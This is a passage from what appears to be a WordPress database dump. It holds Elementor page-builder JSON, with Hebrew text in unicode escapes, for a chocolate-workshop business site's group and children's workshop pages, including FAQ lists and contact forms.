\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d4\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/p><p><strong>\\u05db\\u05df, \\u05d2\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e2\\u05db\\u05e9\\u05d9\\u05d5 \\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8 \\u05dc\\u05db\\u05dd, \\u05d6\\u05d4 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05d9\\u05d7\\u05d3 \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5.\\u00a0<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40986278\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"69a8df27\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6999b663\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3ea5b73c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"17ab813e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"37c615a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7559efb1\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea (\\u05d1\\u05d8\\u05d7 \\u05ea\\u05e8\\u05e6\\u05d5 \\u05e1\\u05d1\\u05d9\\u05d1\\u05d4 \\u05d8\\u05d1\\u05e2\\u05d9\\u05ea)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e2\\u05d3 \\u05db4 \\u05e9\\u05e2\\u05d5\\u05ea\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd \\u05d5\\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8\\u05d9\\u05dd \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d4\\u05dd \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d9\\u05d0\\u05db\\u05dc\\u05d5, \\u05d4\\u05dd \\u05d2\\u05dd \\u05d9\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05dc\\u05e2\\u05e6\\u05de\\u05dd \\u05dc\\u05de\\u05d7\\u05e8 \\u05de\\u05d4 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d9\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3, \\u05d6\\u05d4 \\u05d1\\u05e1\\u05d3\\u05e8 \\u05d2\\u05de\\u05d5\\u05e8, \\u05db\\u05de\\u05d4 \\u05e9\\u05ea\\u05e8\\u05e6\\u05d5 - \\u05d9\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"694d95f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3e053522\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1557,322,'_elementor_version','0.4'),(1558,322,'_elementor_template_type','post'),(1561,323,'_wp_page_template','elementor_header_footer'),(1562,323,'_elementor_edit_mode','builder'),(1563,323,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1564,323,'_elementor_version','0.4'),(1565,323,'_elementor_template_type','post'),(1568,324,'_wp_page_template','elementor_header_footer'),(1569,324,'_elementor_edit_mode','builder'),(1570,324,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea 